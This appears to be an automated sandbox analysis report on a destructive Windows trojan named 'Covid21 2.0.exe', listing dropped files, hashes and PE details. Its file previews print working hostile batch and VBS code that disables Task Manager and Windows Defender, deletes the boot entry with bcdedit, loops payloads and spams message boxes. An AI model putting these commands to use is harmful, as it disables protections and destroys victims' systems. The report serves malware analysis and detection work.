Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Critical Process Termination
Detection:	MAL
Classification:	mal75.rans.evad.winEXE@65/18@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 92.9% (good quality ratio 90.3%) Quality average: 84.5% Quality standard deviation: 24.7%
HCA Information:	Successful, ratio: 53% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:35:43	API Interceptor	1x Sleep call for process: z.exe modified
15:36:02	API Interceptor	1x Sleep call for process: screenscrew.exe modified
15:36:12	Task Scheduler	Run new task: Windows Update path: C:\Users\user\AppData\Local\Temp\2870.tmp\PayloadMBR.exe

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	covid21.exe	Get hash	malicious	Browse
	HorrorTrojan 2.exe	Get hash	malicious	Browse
	HorrorTrojan.exe	Get hash	malicious	Browse
	HorrorTrojan.exe	Get hash	malicious	Browse
	Fall Guys Cheat.exe	Get hash	malicious	Browse
	Fall Guys Cheat.exe	Get hash	malicious	Browse
	freebobux.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\2870.tmp\PayloadMBR.exe	covid21.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe Download File
Process:	C:\Users\user\Desktop\Covid21 2.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	517120
Entropy (8bit):	6.5991952372789155
Encrypted:	false
SSDEEP:	12288:kDupRTrjf1nJp2NLtVu4jPau4p+lE3dWq:SExrj1DAt84DaTU4dW
MD5:	E62EE6F1EFC85CB36D62AB779DB6E4EC
SHA1:	DA07EC94CF2CB2B430E15BD0C5084996A47EE649
SHA-256:	13B4EC59785A1B367EFB691A3D5C86EB5AAF1CA0062521C4782E1BAAC6633F8A
SHA-512:	8142086979EC1CA9675418E94326A40078400AFF8587FC613E17164E034BADD828E9615589E6CB8B9339DA7CDC9BCB8C48E0890C5F288068F4B86FF659670A69
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 4%, Browse Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: covid21.exe, Detection: malicious, Browse Filename: HorrorTrojan 2.exe, Detection: malicious, Browse Filename: HorrorTrojan.exe, Detection: malicious, Browse Filename: HorrorTrojan.exe, Detection: malicious, Browse Filename: Fall Guys Cheat.exe, Detection: malicious, Browse Filename: Fall Guys Cheat.exe, Detection: malicious, Browse Filename: freebobux.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,.............@..........................@...................@...............................!.......p...................`...f...........................P......................................................CODE................................ ..`DATA................................@...BSS......................................idata...!......."..................@....tls....4....@...........................rdata.......P......................@..P.reloc...f...`...h..................@..P.rsrc....p.......p...t..............@..P.............@......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\2870.tmp\Corona.exe Download File
Process:	C:\Users\user\Desktop\Covid21 2.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	531456
Entropy (8bit):	7.007155751747995
Encrypted:	false
SSDEEP:	12288:bt007p82D5NYQ1bjLXHfNOTliq6G8/Q3Uk+leP4RG3:2qpzvYQ1Tfoi8b3U1kaq
MD5:	6374CA8AD59246DFED4794FD788D6560
SHA1:	D54281430AD11272F657DE4E909B4BA7B8561821
SHA-256:	25B6F4ABC0B8A7A3F3CAE54A2F75810B977C0F5ED20AF98E77BE9449E7135108
SHA-512:	0434F5C6ECD1A036A59E2F5DE56F0905460D46C31FFF6A7F160F54CFBCB56EA2DA22647D564E53D66C47A789A67D165C59E64D924B0F2CF80FDCD865847A772F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................2......H.............@..............................................@...........................0..V ..............................LX...........................p......................................................CODE................................ ..`DATA....8...........................@...BSS.......... ...........................idata..V ...0..."..................@....tls.........`...........................rdata.......p......................@..P.reloc..LX.......Z... ..............@..P.rsrc................z..............@..P....................................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\2870.tmp\Covid21.bat Download File
Process:	C:\Users\user\Desktop\Covid21 2.0.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1444
Entropy (8bit):	5.183015206655524
Encrypted:	false
SSDEEP:	24:YfzzhPV10V1+Vb+OV3q1gvV1Y5U2VVjfA+ifuhwXVCRB3aoSOZcRWm:YRPq+8OZq1gvAU2fTAnfuhwFCRB3ayeP
MD5:	6B89A7FD6E3D9BDC4658162AAF468558
SHA1:	F8EF11B2420B95661565B799D86C188BF11BF4A7
SHA-256:	76986CDDBFEB8FA8738C8CA2665A7F91D19D1E8C6851151FCBA5164E35618DFB
SHA-512:	F9B3338B65D5CA6CC25B1C36B2C3299D758D5E7AC92E6FD8D0298F945E898C51E548323F86A12983BB375E49404CB6B401F5472BBB580A6675DF57277045EF12
Malicious:	false
Preview:	@echo off..echo deleting previous versions of covid21.....rd c:\covid21 /s /q..cscript prompt.vbs..if ERRORLEVEL==1 goto infect..if ERRORLEVEL==0 goto quit....:infect..REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f..Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f..md c:\covid21..copy covid.jpg c:\covid21..clwcp c:\covid21\covid.jpg..reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f..echo do > x.vbs..echo msgbox "Covid-21 is here! Your Windows will get destroyed soon!" >>x.vbs..echo loop >>x.vbs..start x.vbs..bcdedit /delete {current}..copy corona.exe c:\covid21..start /min coronaloop.bat..echo msgbox "corona virus" >y.vbs..timeout 5 /nobreak..start inv.exe..start y.vbs..timeout 5 /nobreak..start z.exe..start y.vbs..timeout 5 /nobreak..start mlt.exe..start y.vbs..timeout 5 /nobr

C:\Users\user\AppData\Local\Temp\2870.tmp\PayloadMBR.exe Download File
Process:	C:\Users\user\Desktop\Covid21 2.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	103424
Entropy (8bit):	6.182089878681113
Encrypted:	false
SSDEEP:	3072:wCGPVHzzgd2HPVVf9AebuLFfK9s7I+PnNgDd9:wrak9gor+Pn6
MD5:	D917AF256A1D20B4EAC477CDB189367B
SHA1:	6C2FA4648B16B89C4F5664F1C3490EC2022EB5DD
SHA-256:	E40F57F6693F4B817BEB50DE68027AABBB0376CA94A774F86E3833BAF93DC4C0
SHA-512:	FD2CB0FB398A5DDD0A52CF2EFC733C606884AA68EC406BDBDDB3A41B31D6F9C0F0C4837326A9D53B53202792867901899A8CF5024A5E542E8BDCEE615BE0B707
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Joe Sandbox View:	Filename: covid21.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*................."...n.......-.......@....@..........................0...................@......................................h...........................................................................................................CODE.....!.......".................. ..`DATA.....5...@...6...&..............@...BSS......8...........\...................idata...............\..............@....tls.................h...................rdata...............h..............@..P.reloc...............j..............@..P.rsrc...h...........................@..P.............0......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\2870.tmp\coronaloop.bat Download File
Process:	C:\Users\user\Desktop\Covid21 2.0.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	48
Entropy (8bit):	4.292962241741917
Encrypted:	false
SSDEEP:	3:jTDVJWoHgKTHd6vJcn:/etmdEJcn
MD5:	08437E731C7B135B3779B004C7863E5F
SHA1:	24CE5D4075FDC5AFEC6CB87CACFC7B54DEADC3EC
SHA-256:	043B49FBBE070997844A2C4467596553261BFB6EA79AC3C50FABD42146EEA924
SHA-512:	6006014B10F400B6975B391BE64E07E78FE5A3818CD39A0A8F9349C4CFF595134FB5217BEB5205E04EAB86473C4FA0F6701B657D76C144540AA468D2D382C8A1
Malicious:	false
Preview:	echo off..cls..:0..c:\covid21\corona.exe..goto 0

C:\Users\user\AppData\Local\Temp\2870.tmp\covid.jpg Download File
Process:	C:\Users\user\Desktop\Covid21 2.0.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1920x1080, frames 3
Category:	dropped
Size (bytes):	170445
Entropy (8bit):	7.987389688426996
Encrypted:	false
SSDEEP:	3072:mTwQIE+8Tj6wFrxGxGtSdWyCmI5KkeD8vcWtTH3Mi/gc+P9IP7HwKFKBlrF:qOE+o6hgcYLmI5+8k+TH3Mi/J+Pi7Hwn
MD5:	94AD752ABC09644D0B91A07022ECB000
SHA1:	7EE97DC56E62E7B2D86EE892E7CF70673252242F
SHA-256:	E3760C671CEC108580D47B0F8C11AE79E9DF9941D2E878032EEDA1B510F91231
SHA-512:	9C0109A8E7DE5EA42B3CE8788A412F6ED1158AFD3DB87884034631DA15EC4C16275F0578C6AD438E91DC203C89AEF725D2642E06B751DF5CFF0D47B3D9A1AD1E
Malicious:	false
Preview:	......JFIF.....H.H......ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...\|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....\|.i.}...0.....C..................................................#...#%%525EE\...C..................................................#...#%%525EE\......8....".....................................................................................DFD..)`.$bD...1"#"DIP..."$d..H.D..bI .(.F ......."I.F.0..b.A..I".B0...$.F.0#.$$`(H..$.J...W..~R....5...i.xlVc'..j.2b..U^}y..>d...)P$B F...P..1.T............T.PS*.aL@..B......$.0....0...$.. I.@."..$

C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe Download File
Process:	C:\Users\user\Desktop\Covid21 2.0.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	107828
Entropy (8bit):	5.4025127824732335
Encrypted:	false
SSDEEP:	1536:eb4k5iT76crYyIyLIOwu3yUywCbsR+EKDyfq1aX:eb4N36cHIyLGMbzX
MD5:	3CA1D5768C2944D4284B1541653823C7
SHA1:	85CF021AC23CD1340C6D649E6A77A213C1F848B6
SHA-256:	4172C6120F8F98685698365D6DD52C80EB2080203CDDE479009BF8F4FA770AF0
SHA-512:	7972ADB329DBEBC347B8A68789BBAC4BA7C230CC980910D18A322D1A512015633D2A5801E76C0AAE2FCFE120790C69417864549787DFC37574FB0AA3BFC202F0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O6`.2..S................................0....@.................................!......... ..............................`..0...................................................................................0a...............................text............................... .P`.data...,....0......................@.0..rdata..p....@......................@.0@.bss....P....P........................p..idata..0....`.......$..............@.0..CRT....4....p.......,..............@.0..tls.... ...........................@.0./4...................0..............@.@B/19..................4..............@..B/31.....k....P......................@..B/45..........p......................@..B/57.................................@.0B/70.................................@..B/81.................. ..............@..B/92.....@...........................@..B........................

C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe Download File
Process:	C:\Users\user\Desktop\Covid21 2.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	367616
Entropy (8bit):	6.563758955317025
Encrypted:	false
SSDEEP:	6144:qizJVFAO7rdGlh4sQstCPhiomhiGM80JCMlTe06z0aPawSoQBAlAq4SYwhl:RJ/AO7rAlys3tCj80x6zlawSo5Aq4Xwv
MD5:	EBB811D0396C06A70FE74D9B23679446
SHA1:	E375F124A8284479DD052161A07F57DE28397638
SHA-256:	28E979002CB4DB546BF9D9D58F5A55FD8319BE638A0974C634CAE6E7E9DBCD89
SHA-512:	1DE3DCD856F30004BECEE7C769D62530F3A5E9785C853537ADC0A387D461C97B305F75CBAF13F278DD72BA22D4650E92C48EDF3C3A74B13ED68FFC0D45E13774
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 6%, Browse Antivirus: ReversingLabs, Detection: 48%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..........................................@..............................................@......................................T...................@...T...........................0......................................................CODE....L........................... ..`DATA.... ...........................@...BSS......................................idata..*........ ..................@....tls......... ...........................rdata.......0......................@..P.reloc...T...@...V..................@..P.rsrc....T.......T...H..............@..P....................................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe Download File
Process:	C:\Users\user\Desktop\Covid21 2.0.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133205
Entropy (8bit):	5.137252527177841
Encrypted:	false
SSDEEP:	1536:cPFc9HtJsjy6maNXRBOseWG7NVW/ZTAUvMFMQiNXR/QRBX1bXckplRU:sS9N+fB47NVW/ZToWRofXZX5lRU
MD5:	A4E26D32F9655DBE8EFD276A530EB02B
SHA1:	D194526518FDDD34BFC75CC0575D9B5CF3E1E304
SHA-256:	4C2277C81CBF6C415AB874CFB32D3B0049C8B18AC7EEE1DD6C1F5D9F5F043C83
SHA-512:	E77C58B321A1C696554B018CC51FAD2F2DF4BAC39FA90F17A83EC646C90D67B6DA5FCCB2E80C468E2CF32CC7F9F3F62B160C3F0AFBC2130FAA1002ECDE5B5676
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...6._..........'...........................@.............................. .......)........ ..............................................................P..4........................................... ...(...................<................................text...0........................... .P`.data........0.......$..............@.P..rdata.......@.......&..............@.P@.pdata..4....P......................@.0@.xdata.......`.......2..............@.0@.bss....`....p........................p..idata...............4..............@.0..CRT....h............>..............@.@..tls....h............@..............@.`./4...... ............B..............@.PB/19.....z............H..............@..B/31.....<...........................@..B/45..................$..............@..B/57..................>..............@.@B/70..................J..............@..B/81.....

C:\Users\user\AppData\Local\Temp\2870.tmp\prompt.vbs Download File
Process:	C:\Users\user\Desktop\Covid21 2.0.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	188
Entropy (8bit):	4.787831418201213
Encrypted:	false
SSDEEP:	3:KRCWhCOHGJ5FcFP01RFPKO9/zRWPxBIXFMlkLvxWeeXlVSpXAov/FLVS9AD:KI/NJSyd/sKFMlCvxW3S3NpSyD
MD5:	82C0A5E92259FF193B914E6C0D7C8A7A
SHA1:	ED6868EFF7055555689E613A62F4275EAFA97C36
SHA-256:	02E3663BB7BC9F8FE4377887DC24E63FC83187BE9CB0181F87E5F93AF4C7CA8B
SHA-512:	43C1EF453531200DD625945A65727DAEF28EE480FB210E97846633841F8215261E3195A8BE77C280E8B6FE193B59C7367302C3FC74879B5952FA31F3235DDB62
Malicious:	false
Preview:	intAnswer = _.. Msgbox("This Trojan is no joke, do you want to run it?", _.. vbYesNo, "Covid-21")..If intAnswer = vbYes Then.. WScript.Quit 1..Else.. WScript.Quit 0..End If

C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe Download File
Process:	C:\Users\user\Desktop\Covid21 2.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	113664
Entropy (8bit):	7.838778904595643
Encrypted:	false
SSDEEP:	1536:o0J9QXrssV7g4Rq3b24oFDo2mL7oagiBGVHo8J75qUbGuNxTJeqq62hxcmpn6izz:o0J9QbLkewys+C6pNxFE7Z6wAO
MD5:	E87A04C270F98BB6B5677CC789D1AD1D
SHA1:	8C14CB338E23D4A82F6310D13B36729E543FF0CA
SHA-256:	E03520794F00FB39EF3CFFF012F72A5D03C60F89DE28DBE69016F6ED151B5338
SHA-512:	8784F4D42908E54ECEDFB06B254992C63920F43A27903CCEDD336DAAEED346DB44E1F40E7DB971735DA707B5B32206BE1B1571BC0D6A2D6EB90BBF9D1F69DE13
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 36%, Browse Antivirus: ReversingLabs, Detection: 62%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.............................p............@..............................................@..........................................................T...............................<.......................................................CODE.............P..................@...DATA.................T..............@...BSS.......... .......Z..............@....idata... ...0.......Z..............@....tls.........P.......f..............@....rdata.......`.......f..............@....reloc...@...p.......h..............@....rsrc............:...h..............@....aspack.. ...p......................@....adata..............................@...................................................................................................

C:\Users\user\AppData\Local\Temp\2870.tmp\t.vbs Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.385220179839388
Encrypted:	false
SSDEEP:	3:rCmFOIaPMogDXK+8YHSv:FFJaCDXxDHc
MD5:	EE0306A79AAEFBD4CF3BC7E5F8A0D3B1
SHA1:	32DAE2CFB0AF831F0E8445F36C0D2CE0FE9B2E88
SHA-256:	969AE83F1366975BECE266C3BE5994291C55302E93564A1435FE542B456904EC
SHA-512:	FDFAB128F4F096F4B4DD31758116522337644F269CB28E1496E20D866083BF31D277A123704E8924A0FC4EF0212CBA89E3AB9FDDCAFFCF400C859C8DF87736FD
Malicious:	true
Preview:	msgbox "Your Windows will die from Covid-21 Corona Virus" ..

C:\Users\user\AppData\Local\Temp\2870.tmp\x.vbs Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	79
Entropy (8bit):	4.403941477424042
Encrypted:	false
SSDEEP:	3:xDCHGF6IX8SAfPMtjxdMzlyJ4:xYGFr8jfkjxdMRyJ4
MD5:	7740551865A57633B3E92986352DFA1B
SHA1:	74070B3636B69B710C32996FC1640129202F4CAF
SHA-256:	8A36ECC37EB454FE13B4B31EB9EDA67919AA5DD3A474480930982EF93334499A
SHA-512:	B4C5902F3CA91FA83EC0297254ACF5F63B2145500863AFB86F96B9C2D3844C8C476CD0F6DD31E3EB92C4ACA2CD35C2F6BE563549817B676FA9B4592F280C79F2
Malicious:	true
Preview:	do ..msgbox "Covid-21 is here! Your Windows will get destroyed soon!" ..loop ..

C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	3.938721875540868
Encrypted:	false
SSDEEP:	3:rCmFLFDgov:FFxJ
MD5:	5ECB02EAAA322BE4DF7F61A1A23C799D
SHA1:	BEC83A2546F38A7133EF962D09CD520F87E5ABB2
SHA-256:	D78710D080D6200BFF04D443F8FA923F619914FB191DC2B3865DA1F3D9739E30
SHA-512:	2306F4FC08E0AEFE4A44C4507E46EE2D3D808423EC8D31980980F785E20C0DF301A9B3D9A2469D609E054D5A8AC4089AC39FFB388B70ED8A36F688B4362A2F88
Malicious:	true
Preview:	msgbox "corona virus" ..

C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe Download File
Process:	C:\Users\user\Desktop\Covid21 2.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	422029
Entropy (8bit):	6.688336510135275
Encrypted:	false
SSDEEP:	12288:5NIQAPGsAqY9IMVYd38sJdpQHlGlY8KfTQ:uPGSY91VwNJcFMqTQ
MD5:	A7CE5BEE03C197F0A99427C4B590F4A0
SHA1:	14D8617C51947FB49B3ABA7E9AECE83E5094CF71
SHA-256:	0C53A3EC2B432A9013546F92416109D7E8F64CEA26AC2491635B4CF2A310D852
SHA-512:	7F3C56C42D899ADA5ACDC5C162391F9FA06455DB08E6DF0A57132CA5B1BB3D52E6DBC9342310480D45AA32915502ACEB7552375A45D3FD1A54FEE0E73AF6024A
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 7%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Lp.........................}...........2..............2.......2.................c........................Rich............................PE..L......J.....................>......O+............@...........................................@..............................'........... ...........................................................................................................text.............................. ..`.rdata..(...........................@..@.data....z...P... ...4..............@....rsrc.... ...........T..............@..@................................................................................................................................................................................................................................................................................................................................

C:\Windows\clwcp.bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe
File Type:	PC bitmap, Windows 3.x format, 1920 x 1080 x 24
Category:	dropped
Size (bytes):	6220854
Entropy (8bit):	6.660583803059703
Encrypted:	false
SSDEEP:	24576:cjUJucwO/CkHCoUQnI7Er5OBVB8JCsMjdsWYDaFWiG0SQbrGJVXVuBX0j6BHpsPH:gUJucwHkHlUQ9QBr8nMqVD/6SbuB8BV
MD5:	1A6ACC65486762EE05D1ABD90169CAF2
SHA1:	12DB4A705D5DBDA06625FA38FC6B1A6AD73FD0B9
SHA-256:	0733EE5D3CF3B3E574C3A052C78DFC0D9791A7099DFAA8D3A0372075496311B3
SHA-512:	D4B2E9E7261FF91DB206242314D50C66978E0353E113D72BC48637A41D12D3CFA00C5F04B2A744937769CD433ABADB9872C72CF158A9F0863B9F40B6962D27D5
Malicious:	false
Preview:	BM6.^.....6...(.......8.............^......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... .. .. .. .. .. .. .. ..!..!..!..!..!..!..!..!..!..!..!. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. !. ".!".!".!".!".!".!".!".!!. !. ".!".!".!".!".!".!" " " " " " " " " " " " " " " " #!!#!!#!!#!!#!!#!!#!!#!!#!!#!!#!!#!!#!!#!!#!!#!!$!#$!#$!#$!#$!#$!#$!#$!#$!#$!#$!#$

C:\covid21\Corona.exe Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	531456
Entropy (8bit):	7.007155751747995
Encrypted:	false
SSDEEP:	12288:bt007p82D5NYQ1bjLXHfNOTliq6G8/Q3Uk+leP4RG3:2qpzvYQ1Tfoi8b3U1kaq
MD5:	6374CA8AD59246DFED4794FD788D6560
SHA1:	D54281430AD11272F657DE4E909B4BA7B8561821
SHA-256:	25B6F4ABC0B8A7A3F3CAE54A2F75810B977C0F5ED20AF98E77BE9449E7135108
SHA-512:	0434F5C6ECD1A036A59E2F5DE56F0905460D46C31FFF6A7F160F54CFBCB56EA2DA22647D564E53D66C47A789A67D165C59E64D924B0F2CF80FDCD865847A772F
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................2......H.............@..............................................@...........................0..V ..............................LX...........................p......................................................CODE................................ ..`DATA....8...........................@...BSS.......... ...........................idata..V ...0..."..................@....tls.........`...........................rdata.......p......................@..P.reloc..LX.......Z... ..............@..P.rsrc................z..............@..P....................................@..P........................................................................................................................................

C:\covid21\covid.jpg Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1920x1080, frames 3
Category:	dropped
Size (bytes):	170445
Entropy (8bit):	7.987389688426996
Encrypted:	false
SSDEEP:	3072:mTwQIE+8Tj6wFrxGxGtSdWyCmI5KkeD8vcWtTH3Mi/gc+P9IP7HwKFKBlrF:qOE+o6hgcYLmI5+8k+TH3Mi/J+Pi7Hwn
MD5:	94AD752ABC09644D0B91A07022ECB000
SHA1:	7EE97DC56E62E7B2D86EE892E7CF70673252242F
SHA-256:	E3760C671CEC108580D47B0F8C11AE79E9DF9941D2E878032EEDA1B510F91231
SHA-512:	9C0109A8E7DE5EA42B3CE8788A412F6ED1158AFD3DB87884034631DA15EC4C16275F0578C6AD438E91DC203C89AEF725D2642E06B751DF5CFF0D47B3D9A1AD1E
Malicious:	false
Preview:	......JFIF.....H.H......ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...\|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....\|.i.}...0.....C..................................................#...#%%525EE\...C..................................................#...#%%525EE\......8....".....................................................................................DFD..)`.$bD...1"#"DIP..."$d..H.D..bI .(.F ......."I.F.0..b.A..I".B0...$.F.0#.$$`(H..$.J...W..~R....5...i.xlVc'..j.2b..U^}y..>d...)P$B F...P..1.T............T.PS*.aL@..B......$.0....0...$.. I.@."..$

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.7326173175378665
TrID:	Win32 Executable (generic) a (10002005/4) 99.39% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	Covid21 2.0.exe
File size:	1210880
MD5:	a7c7f5e792809db8653a75c958f82bc4
SHA1:	7ebe75db24af98efdcfebd970e7eea4b029f9f81
SHA256:	02fea9970500d498e602b22cea68ade9869aca40a5cdc79cf1798644ba2057ca
SHA512:	feb42cc7b4f344c043bda8bebeefa8cbb68406d1e937dcdc5a403981f79587fa438c682c4744a47a77482fc049b0334806d468aeb67edd4a92d90b5acd0c16ae
SSDEEP:	24576:kweQ5x+HPXJ9N2qifMpZcu/6z6toe20xYuLFzY77+89J9o2:kwVeHhH2qoMIum62uhY7Kco2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'..L...............2.`...0...P..0.)..`....)...@...........................,............................................

File Icon


Icon Hash:	4c8e2b2f0f030e0d

Static PE Info

General
Entrypoint:	0x69aa30
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4CD7F727 [Mon Nov 8 13:12:07 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1d88d597200c0081784c27940d743ec5

Entrypoint Preview

Instruction
pushad
mov esi, 005A6015h
lea edi, dword ptr [esi-001A5015h]
push edi
mov ebp, esp
lea ebx, dword ptr [esp-00003E80h]
xor eax, eax
push eax
cmp esp, ebx
jne 00007F43090B876Dh
inc esi
inc esi
push ebx
push 00298988h
push edi
add ebx, 04h
push ebx
push 000F4A0Bh
push esi
add ebx, 04h
push ebx
push eax
mov dword ptr [ebx], 00020003h
nop
nop
nop
nop
nop
push ebp
push edi
push esi
push ebx
sub esp, 7Ch
mov edx, dword ptr [esp+00000090h]
mov dword ptr [esp+74h], 00000000h
mov byte ptr [esp+73h], 00000000h
mov ebp, dword ptr [esp+0000009Ch]
lea eax, dword ptr [edx+04h]
mov dword ptr [esp+78h], eax
mov eax, 00000001h
movzx ecx, byte ptr [edx+02h]
mov ebx, eax
shl ebx, cl
mov ecx, ebx
dec ecx
mov dword ptr [esp+6Ch], ecx
movzx ecx, byte ptr [edx+01h]
shl eax, cl
dec eax
mov dword ptr [esp+68h], eax
mov eax, dword ptr [esp+000000A8h]
movzx esi, byte ptr [edx]
mov dword ptr [ebp+00h], 00000000h
mov dword ptr [esp+60h], 00000000h
mov dword ptr [eax], 00000000h
mov eax, 00000300h
mov dword ptr [esp+64h], esi
mov dword ptr [esp+5Ch], 00000001h
mov dword ptr [esp+58h], 00000001h
mov dword ptr [esp+54h], 00000001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2cdf44	0x220	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x29c000	0x31f44	.rsrc
